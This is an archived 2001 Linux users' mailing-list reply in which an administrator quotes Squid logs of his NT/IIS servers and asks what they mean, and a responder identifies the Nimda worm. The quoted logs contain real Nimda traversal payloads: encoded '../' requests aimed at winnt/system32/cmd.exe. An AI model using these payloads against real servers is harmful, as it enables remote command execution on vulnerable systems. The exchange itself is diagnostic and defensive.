[plug] Re: WinNT Server Access Problem

[Paul P. Pongco]

this is the nimda worm
check,

http://www.cert.org/advisories/CA-2001-26.html

=>Date: Wed, 19 Sep 2001 10:35:56 +0800 (PHT)
=>From: Arvin V. Carlos <[EMAIL PROTECTED]>
=>To: [EMAIL PROTECTED]
=>Cc: Plug Mailing List <[EMAIL PROTECTED]>
=>Subject: WinNT Server Access Problem
=>
=>
=>We have two NT 4.0 running IIS, suddenly our squid went down because of
=>disk space problme, we check our log files and it eats pur disk space
=>beacuse of our NT Machines try to resolv this all the time:
=>
=>255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe
=>? - DIRECT/www -
=>1000866350.455      1 208.142.136.115 TCP_MISS/503 1202 GET
=>http://www/scripts/.
=>.%c1%1c../winnt/system32/cmd.exe? - DIRECT/www -
=>1000866350.487      1 208.142.136.115 TCP_MISS/503 1168 GET
=>http://www/c/winnt/s
=>ystem32/cmd.exe? - DIRECT/www -
=>1000866350.496      1 208.142.136.115 TCP_MISS/503 1168 GET
=>http://www/d/winnt/s
=>ystem32/cmd.exe? - DIRECT/www -
=>1000866350.505      2 208.142.136.115 TCP_MISS/503 1200 GET
=>http://www/scripts/.
=>.%255c../winnt/system32/cmd.exe? - DIRECT/www -
=>1000866350.514      2 208.142.136.115 TCP_MISS/503 1242 GET
=>http://www/_vti_bin/
=>..%255c../..%255c../..%255c../winnt/system32/cmd.exe? - DIRECT/www -
=>1000866350.530      1 208.142.136.115 TCP_MISS/503 1242 GET
=>http://www/_mem_bin/
=>..%255c../..%255c../..%255c../winnt/system32/cmd.exe? - DIRECT/www -
=>1000866350.539      2 208.142.136.115 TCP_MISS/503 1299 GET
=>http://www/msadc/..%
=>255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe
=>? - DIRECT/www -
=>1000866350.548      2 208.142.136.115 TCP_MISS/503 1202 GET
=>http://www/scripts/.
=>.%c1%1c../winnt/system32/cmd.exe? - DIRECT/www -
=>1000866350.557      1 208.142.136.115 TCP_MISS/503 1202 GET
=>http://www/scripts/.
=>.%c0%2f../winnt/system32/cmd.exe? - DIRECT/www -
=>
=>anyone can explain this? this is a virus? pls HELP!!!
=>
=>

-- 
Cheers,

Paul P. Pongco
Mosaic Communications Inc.




_
Philippine Linux Users Group. Web site and archives at http://plug.linux.org.ph
To leave: send "unsubscribe" in the body to [EMAIL PROTECTED]

To subscribe to the Linux Newbies' List: send "subscribe" in the body to 
[EMAIL PROTECTED]